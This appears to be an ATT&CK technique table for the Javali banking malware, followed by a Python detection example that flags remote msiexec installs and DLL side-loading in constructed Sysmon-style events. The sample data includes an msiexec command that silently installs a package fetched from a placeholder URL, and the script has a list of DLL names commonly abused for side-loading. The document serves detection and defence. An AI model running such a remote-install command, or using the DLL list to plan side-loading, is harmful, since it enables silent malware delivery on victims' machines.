| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.[1] |
| Enterprise | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Javali can use DLL side-loading to load malicious DLLs into legitimate executables.[1] |
| Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | Javali has used embedded VBScript to download malicious payloads from C2.[1] |
| Enterprise | T1027.001 | Obfuscated Files or Information: Binary Padding | Javali can use large obfuscated libraries to hinder detection and analysis.[1] |
| Enterprise | T1204.001 | User Execution: Malicious Link | Javali has achieved execution through victims clicking links to malicious websites.[1] |
| Enterprise | T1204.002 | User Execution: Malicious File | Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.[1] |
| Enterprise | T1218.007 | System Binary Proxy Execution: Msiexec | Javali has used the MSI installer to download and execute malicious payloads.[1] |
| Enterprise | T1102.001 | Web Service: Dead Drop Resolver | Javali can read C2 information from Google Documents and YouTube.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1057 | Process Discovery | Javali can monitor processes for open browsers and custom banking applications.[1] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Javali has been delivered as malicious e-mail attachments.[1] |
| Enterprise | T1566.002 | Phishing: Spearphishing Link | Javali has been delivered via malicious links embedded in e-mails.[1] |
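Two rows in the table, Msiexec (T1218.007) and DLL Side-Loading (T1574.002), describe behaviour that leaves clear traces in endpoint telemetry. The following is an added detection example written for this page; it is not Javali's code and not part of the ATT&CK entry. It runs two checks over constructed events whose field names mirror Sysmon Event ID 1 (ProcessCreate) and Event ID 7 (ImageLoad): msiexec being handed a package by URL, and a commonly side-loaded system DLL name being loaded from outside the Windows system directories. The sample events, the `SYSTEM_DLL_DIRS` allow-list and the `SIDELOAD_PRONE_DLLS` name list are assumptions chosen for illustration and would need tuning for a real estate.

```python
import re

# Constructed sample telemetry (not real Javali events). Field names mirror
# Sysmon Event ID 1 (ProcessCreate) and Event ID 7 (ImageLoad).
SAMPLE_EVENTS = [
    # msiexec pulling an installer from a remote URL: T1218.007
    {"EventID": 1, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i https://cdn.example.invalid/update.msi /qn"},
    # msiexec installing a local, vendor-shipped package: benign
    {"EventID": 1, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": 'msiexec.exe /i "C:\\Program Files\\Vendor\\setup.msi" /qn'},
    # host executable loading an unsigned version.dll from its own folder: T1574.002
    {"EventID": 7, "Image": "C:\\Users\\alice\\AppData\\Roaming\\Viewer\\viewer.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Roaming\\Viewer\\version.dll",
     "Signed": "false"},
    # same DLL name loaded from System32: benign
    {"EventID": 7, "Image": "C:\\Users\\alice\\AppData\\Roaming\\Viewer\\viewer.exe",
     "ImageLoaded": "C:\\Windows\\System32\\version.dll",
     "Signed": "true"},
]

# Assumed allow-list: directories from which Windows system DLLs are expected
# to be loaded. Extend for your environment (e.g. per-machine app roots).
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                   "c:\\windows\\winsxs\\")

# Assumed short sample of DLL names frequently abused for side-loading because
# many signed binaries import them by name. Not exhaustive.
SIDELOAD_PRONE_DLLS = {"version.dll", "dwmapi.dll", "wtsapi32.dll",
                       "uxtheme.dll", "cryptsp.dll", "winmm.dll"}

# msiexec install/admin/advertise switches that accept a package argument.
_MSI_PACKAGE_FLAG_RE = re.compile(r"(?:^|\s)[/-](?:i|package|a|j)\s", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_remote_msiexec(cmdline: str) -> bool:
    """True when msiexec is told to install a package by URL (T1218.007)."""
    return "://" in cmdline and _MSI_PACKAGE_FLAG_RE.search(cmdline) is not None


def is_dll_sideload(image_loaded: str, signed: str) -> bool:
    """True when a side-load-prone DLL name is loaded from outside the system dirs
    (T1574.002). A signed copy outside the system dirs is still reported, because
    the host binary, not the DLL, is what makes the load look legitimate."""
    if basename(image_loaded) not in SIDELOAD_PRONE_DLLS:
        return False
    return not image_loaded.lower().startswith(SYSTEM_DLL_DIRS)


def triage(events):
    """Return a list of findings, each tagged with the ATT&CK sub-technique ID."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1 and basename(ev.get("Image", "")) == "msiexec.exe":
            if is_remote_msiexec(ev.get("CommandLine", "")):
                findings.append({"technique": "T1218.007",
                                 "detail": ev["CommandLine"]})
        elif ev.get("EventID") == 7:
            if is_dll_sideload(ev.get("ImageLoaded", ""), ev.get("Signed", "")):
                findings.append({"technique": "T1574.002",
                                 "detail": "%s loaded %s (Signed=%s)" % (
                                     ev.get("Image"), ev["ImageLoaded"], ev.get("Signed"))})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["technique"], finding["detail"])
```

The msiexec check deliberately requires both a package switch and a `://` token, so an MSI installed from a local path is not reported; the side-load check keys on the DLL name and load path rather than on the signature, so it surfaces the load even when the attacker has signed the DLL, and the signature status is carried in the finding for the analyst to weigh.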